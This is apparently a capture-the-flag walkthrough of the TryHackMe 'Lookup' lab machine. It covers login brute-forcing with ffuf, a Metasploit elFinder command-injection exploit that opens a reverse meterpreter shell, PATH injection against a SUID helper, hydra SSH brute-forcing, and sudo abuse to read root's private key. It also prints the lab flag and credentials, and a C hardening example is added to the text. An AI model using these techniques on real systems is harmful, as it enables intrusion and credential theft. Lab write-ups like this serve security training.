THM Lookup
Summary
This is a Linux machine with SSH and web services. Because login.php generates different
responses for different credentials, we can fuzz the credentials. After logging
in to the system, the platform discloses its version. We leverage it to get a foothold.
First of all, we are a low-privilege (www-data) user. Fortunately, there is a dedicated SUID program
that lets us read the password of the user (think).
After that, we discover a sudo rule that lets us read arbitrary files. We can steal
root's SSH private key!
Scope
- Name: Lookup
- Difficulty: Easy
- OS: Linux
- IP: 10.48.145.40
Learned
- If we discover that a login form responds differently depending on the credentials supplied, we can fuzz it.
- A leaked version number may point to known vulnerabilities.
- During privilege escalation, SUID programs and sudo rules must be considered first.
Enumeration
Nmap
To minimize interaction (which must be considered in real-world scenarios), we will establish
separate policies for TCP and UDP scans. First, we will scan the overall port openness of the host,
then conduct detailed scans on these open ports. Simultaneously, we will also scan certain common
UDP ports.
Overall
nmap -sT --min-rate 5000 -oN overall [IP]
This obtains the overall status of the host (which ports are open). The --min-rate parameter should be adjusted to suit the actual scenario.
Host is up (0.36s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Detail
nmap -sC -sV -O -vv -p22,80 -oN detail [IP]
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 62 OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:1b:df:4d:db:78:96:02:ad:7a:86:e0:76:80:00:36 (RSA)
| 256 80:67:03:2d:4a:12:29:ea:b7:29:ee:6d:cb:89:db:8f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBL0SQBGTH2KsWxrLzodVXVyz1psyz8F9cGx54m5Ljdd1sHJe99mLKLI8VtmYlCRVyRROmuHOjK1iclZNbk+NdVk=
| 256 71:84:a8:de:8b:3f:cf:bc:97:df:1c:a5:50:6d:6d:69 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIADCsy61VH+ajd0kTAacpVDxDseSQfFTbkWciEZuCSAz
80/tcp open http syn-ack ttl 62 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://lookup.thm
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
-sC (default script scan)
Equivalent to --script=default, which includes:
- service detection
- vulnerability detection
- common recon, which includes ssh key, http title, etc.
- brute-force of default creds
-sV (service version detection)
It detects the specific services running on open ports along with their version information, rather than inferring the service type from the port number.
- Send probe packets
- Parse the banner in the response
- Match the fingerprint against the nmap-service-probes DB
-O (OS detection)
It detects the OS type and version by analyzing its network behavior.
- Send specific TCP, UDP and ICMP packets
- Analyze response characteristics
- Detect TCP window size, TTL value, IP ID sequence, TCP options, etc.
UDPScan
nmap -sU --top-ports 32 -oN udpscan [IP]
Host is up (0.32s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
111/udp open|filtered rpcbind
123/udp open|filtered ntp
135/udp closed msrpc
136/udp closed profile
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp open|filtered microsoft-ds
500/udp closed isakmp
514/udp open|filtered syslog
520/udp closed route
631/udp open|filtered ipp
996/udp closed vsinet
997/udp closed maitrd
998/udp open|filtered puparp
999/udp closed applix
1434/udp closed ms-sql-m
1701/udp open|filtered L2TP
1812/udp closed radius
1900/udp closed upnp
3283/udp closed netassistant
4500/udp open|filtered nat-t-ike
5353/udp closed zeroconf
49152/udp closed unknown
49153/udp closed unknown
49154/udp closed unknown
Fuzz (credentials)
When we access port 80, there is a login form. Additionally, we observed that it responds differently based on different credentials.
$ ffuf -w user.txt -X POST -u http://lookup.thm/login.php -d 'username=FUZZ&password=123' -H 'Content-Type: application/x-www-form-urlencoded;charset=UTF-8'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://lookup.thm/login.php
:: Wordlist : FUZZ: /media/psf/workspace/thm/lookup/user.txt
:: Header : Content-Type: application/x-www-form-urlencoded;charset=UTF-8
:: Data : username=FUZZ&password=123
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
lookup [Status: 200, Size: 74, Words: 10, Lines: 1, Duration: 410ms]
root [Status: 200, Size: 74, Words: 10, Lines: 1, Duration: 410ms]
admin [Status: 200, Size: 62, Words: 8, Lines: 1, Duration: 1348ms]
:: Progress: [3/3] :: Job [1/1] :: 3 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
┌──(curtain㉿Kali)-[/media/psf/workspace/thm/lookup]
└─$ curl -X POST -H 'Content-Type: application/x-www-form-urlencoded;charset=UTF-8' -d 'username=admin&password=123' http://lookup.thm/login.php
Wrong password. Please try again.<br>Redirecting in 3 seconds.
┌──(curtain㉿Kali)-[/media/psf/workspace/thm/lookup]
└─$ curl -X POST -H 'Content-Type: application/x-www-form-urlencoded;charset=UTF-8' -d 'username=root&password=123' http://lookup.thm/login.php
Wrong username or password. Please try again.<br>Redirecting in 3 seconds.
At the moment, the first thought that came to mind was that perhaps we could fuzz the credentials.
Fuzz User
First, we fuzz the username: the form responds with "Wrong password" if that user exists.
$ ffuf -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=FUZZ&password=123' -u http://lookup.thm/login.php -fw 10
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://lookup.thm/login.php
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=FUZZ&password=123
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 10
________________________________________________
admin [Status: 200, Size: 62, Words: 8, Lines: 1, Duration: 5007ms]
jose [Status: 200, Size: 62, Words: 8, Lines: 1, Duration: 344ms]
Fuzz password
$ ffuf -w /usr/share/wordlists/seclists/Passwords/Common-Credentials/2023-200_most_used_passwords.txt -X POST -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=jose&password=FUZZ' -u http://lookup.thm/login.php -fw 8
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : POST
:: URL : http://lookup.thm/login.php
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Passwords/Common-Credentials/2023-200_most_used_passwords.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=jose&password=FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 8
________________________________________________
password123 [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 346ms]
:: Progress: [200/200] :: Job [1/1] :: 21 req/sec :: Duration: [0:00:10] :: Errors: 2 ::
Foothold
Version Disclose
After we log in to the system, the following is what we see.

We know that elFinder 2.1.47 is running on that platform.
Command Injection
Searching Google for 'elFinder 2.1.47 vuln', we find this post on a command injection, and
there is a module for it within Metasploit:
msf > search elfinder
Matching Modules
================
#  Name  Disclosure Date  Rank  Check  Description
-  ----  ---------------  ----  -----  -----------
0  exploit/multi/http/builderengine_upload_exec  2016-09-18  excellent  Yes  BuilderEngine Arbitrary File Upload Vulnerability and execution
1  exploit/unix/webapp/tikiwiki_upload_exec  2016-07-11  excellent  Yes  Tiki Wiki Unauthenticated File Upload Vulnerability
2  exploit/multi/http/wp_file_manager_rce  2020-09-09  normal  Yes  WordPress File Manager Unauthenticated Remote Code Execution
3  exploit/linux/http/elfinder_archive_cmd_injection  2021-06-13  excellent  Yes  elFinder Archive Command Injection
4  exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection  2019-02-26  excellent  Yes  elFinder PHP Connector exiftran Command Injection
We set required options according to the docs and boom! we get a meterpreter shell:
msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhost files.lookup.thm
rhost => files.lookup.thm
msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.145.249:4444
[*] Uploading payload '8GrWf3nHF.jpg;echo 6370202e2e2f66696c65732f3847725766336e48462e6a70672a6563686f2a202e445163764c642e706870 |xxd -r -p |sh& #.jpg' (1937 bytes)
[*] Triggering vulnerability via image rotation ...
[*] Executing payload (/elFinder/php/.DQcvLd.php) ...
[*] Sending stage (41224 bytes) to 10.48.145.40
[+] Deleted .DQcvLd.php
[*] No reply
[*] Removing uploaded file ...
[+] Deleted uploaded file
meterpreter >
Privilege Escalation
SUID
Now, we are a low-privilege user.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We can discover all the users from /etc/passwd; we filter out the nologin users here.
cat /etc/passwd | grep -e 'sh$'
root:x:0:0:root:/root:/usr/bin/bash
think:x:1000:1000:,,,:/home/think:/bin/bash
ssm-user:x:1001:1001::/home/ssm-user:/bin/sh
ubuntu:x:1002:1003:Ubuntu:/home/ubuntu:/bin/bash
Let's explore the contents of their home directories.
ls -al /home/ubuntu
total 24
drwxr-xr-x 3 ubuntu ubuntu 4096 Jan 13 08:30 .
drwxr-xr-x 5 root root 4096 Jan 13 08:30 ..
-rw-r--r-- 1 ubuntu ubuntu 220 Jan 11 2024 .bash_logout
-rw-r--r-- 1 ubuntu ubuntu 3771 Jan 11 2024 .bashrc
-rw-r--r-- 1 ubuntu ubuntu 807 Jan 11 2024 .profile
drwx------ 2 ubuntu ubuntu 4096 Jan 13 08:30 .ssh
ls -al /home/ssm-user
total 20
drwxr-xr-x 2 ssm-user ssm-user 4096 May 28 2025 .
drwxr-xr-x 5 root root 4096 Jan 13 08:30 ..
-rw-r--r-- 1 ssm-user ssm-user 220 Jan 11 2024 .bash_logout
-rw-r--r-- 1 ssm-user ssm-user 3771 Jan 11 2024 .bashrc
-rw-r--r-- 1 ssm-user ssm-user 807 Jan 11 2024 .profile
ls -al /home/think
total 40
drwxr-xr-x 5 think think 4096 Jan 11 2024 .
drwxr-xr-x 5 root root 4096 Jan 13 08:30 ..
lrwxrwxrwx 1 root root 9 Jun 21 2023 .bash_history -> /dev/null
-rwxr-xr-x 1 think think 220 Jun 2 2023 .bash_logout
-rwxr-xr-x 1 think think 3771 Jun 2 2023 .bashrc
drwxr-xr-x 2 think think 4096 Jun 21 2023 .cache
drwx------ 3 think think 4096 Aug 9 2023 .gnupg
-rw-r----- 1 root think 525 Jul 30 2023 .passwords
-rwxr-xr-x 1 think think 807 Jun 2 2023 .profile
drw-r----- 2 think think 4096 Jun 21 2023 .ssh
lrwxrwxrwx 1 root root 9 Jun 21 2023 .viminfo -> /dev/null
-rw-r----- 1 root think 33 Jul 30 2023 user.txt
We see a user.txt and a .passwords file in the home directory of user think, but we don't have permission to
read them. So we need to elevate privileges to the user think.
Let's find SUID files first:
www-data@ip-10-48-145-40:/tmp$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/snap/snapd/19457/usr/lib/snapd/snap-confine
/snap/core20/1950/usr/bin/chfn
/snap/core20/1950/usr/bin/chsh
/snap/core20/1950/usr/bin/gpasswd
/snap/core20/1950/usr/bin/mount
/snap/core20/1950/usr/bin/newgrp
/snap/core20/1950/usr/bin/passwd
/snap/core20/1950/usr/bin/su
/snap/core20/1950/usr/bin/sudo
/snap/core20/1950/usr/bin/umount
/snap/core20/1950/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1950/usr/lib/openssh/ssh-keysign
/snap/core20/1974/usr/bin/chfn
/snap/core20/1974/usr/bin/chsh
/snap/core20/1974/usr/bin/gpasswd
/snap/core20/1974/usr/bin/mount
/snap/core20/1974/usr/bin/newgrp
/snap/core20/1974/usr/bin/passwd
/snap/core20/1974/usr/bin/su
/snap/core20/1974/usr/bin/sudo
/snap/core20/1974/usr/bin/umount
/snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1974/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pwm
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
A special program called /usr/sbin/pwm catches our attention. Use the strings command to
take a quick look at this program's string table.
strings /usr/sbin/pwm
...
u+UH
[]A\A]A^A_
[!] Running 'id' command to extract the username and user ID (UID)
[-] Error executing id command
uid=%*u(%[^)])
[-] Error reading username from id command
[!] ID: %s
/home/%s/.passwords
[-] File /home/%s/.passwords not found
:*3$"
GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
crtstuff.c
...
It appears to execute the id command and manipulate the .passwords file within the user's directory.
Let's test whether a PATH Injection vulnerability exists.
PATH Injection
www-data@ip-10-48-145-40:/tmp$ echo '#!/bin/bash' > id
echo '#!/bin/bash' > id
www-data@ip-10-48-145-40:/tmp$ chmod +x id
chmod +x id
www-data@ip-10-48-145-40:/tmp$ echo 'echo "uid=5(think) gid=5(think) groups=5(think)"' >> id
< "uid=5(think) gid=5(think) groups=5(think)"' >> id
www-data@ip-10-48-145-40:/tmp$ cat id
cat id
#!/bin/bash
echo "uid=5(think) gid=5(think) groups=5(think)"
www-data@ip-10-48-145-40:/tmp$ ./id
./id
uid=5(think) gid=5(think) groups=5(think)
www-data@ip-10-48-145-40:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
www-data@ip-10-48-145-40:/tmp$ /usr/sbin/pwm
/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: think
jose1006
jose1004
jose1002
Boom! We leverage this SUID program to read the /home/think/.passwords file.
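Why the fake id works, next to a hardened form, as an added C example. This is not the source of /usr/sbin/pwm (the page only shows its strings); the logic is an assumed reconstruction from the strings output above, and the function names and NAME_MAX_LEN are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define NAME_MAX_LEN 64

/* Pull the user name out of one line of `id` output. The format mirrors the
 * "uid=%*u(%[^)])" string seen in the strings dump; the %63 width is added
 * here so the copy is bounded. Returns 0 on success, -1 on no match. */
int name_from_id_line(const char *line, char out[NAME_MAX_LEN])
{
    return sscanf(line, "uid=%*u(%63[^)])", out) == 1 ? 0 : -1;
}

/* Weak pattern (assumed reconstruction): run a bare `id` through the shell.
 * popen() hands the string to /bin/sh, which searches the caller-controlled
 * PATH, so the text that comes back is input chosen by the caller. */
int caller_name_untrusted(char out[NAME_MAX_LEN])
{
    char line[256];
    FILE *p = popen("id", "r");
    if (p == NULL)
        return -1;
    int rc = fgets(line, sizeof line, p) ? name_from_id_line(line, out) : -1;
    pclose(p);
    return rc;
}

/* Hardened pattern: no child process and no PATH lookup. getuid() returns the
 * real UID of the invoking user (in a SUID binary the effective UID is the
 * file owner), and the passwd database maps that UID to a name. */
int caller_name_trusted(char out[NAME_MAX_LEN])
{
    struct passwd *pw = getpwuid(getuid());
    if (pw == NULL || strlen(pw->pw_name) >= NAME_MAX_LEN)
        return -1;
    strcpy(out, pw->pw_name);
    return 0;
}

int main(void)
{
    char a[NAME_MAX_LEN] = "?", b[NAME_MAX_LEN] = "?";
    caller_name_untrusted(a);
    caller_name_trusted(b);
    printf("from `id` text: %s\nfrom getuid():  %s\n", a, b);
    return 0;
}
```

If a SUID helper really must run an external command, calling it by absolute path with a cleared environment removes the PATH lookup, but deriving identity from getuid() avoids parsing untrusted text altogether.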
Fuzz (ssh brute-force)
We have a username and a password wordlist, so let's brute-force the ssh service with them.
$ hydra -l think -P think_password.txt lookup.thm ssh
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
[DATA] max 16 tasks per 1 server, overall 16 tasks, 50 login tries (l:1/p:50), ~4 tries per task
[DATA] attacking ssh://lookup.thm:22/
[22][ssh] host: lookup.thm login: think password: josemario.AKA(think)
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Bingo! We get it!
SUDO Rule Leverage (arb Read)
Let's check the sudo rules with sudo -l first.
think@ip-10-48-145-40:~$ sudo -l
[sudo] password for think:
Matching Defaults entries for think on ip-10-48-145-40:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User think may run the following commands on ip-10-48-145-40:
(ALL) /usr/bin/look
Fortunately, look is similar to cat, which can read arbitrary files!
think@ip-10-48-145-40:~$ sudo /usr/bin/look '' /root/root.txt
5a285a9f257e45c68bb6c9f9f57d18e8
Or, steal the root ssh private key:
think@ip-10-48-145-40:~$ sudo /usr/bin/look '' /root/.ssh/id_rsa
Copy that and we can log in as root now:
ssh -i root_id_rsa [email protected]
root@ip-10-48-145-40:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ip-10-48-145-40:~# cat root.txt
5a285a9f257e45c68bb6c9f9f57d18e8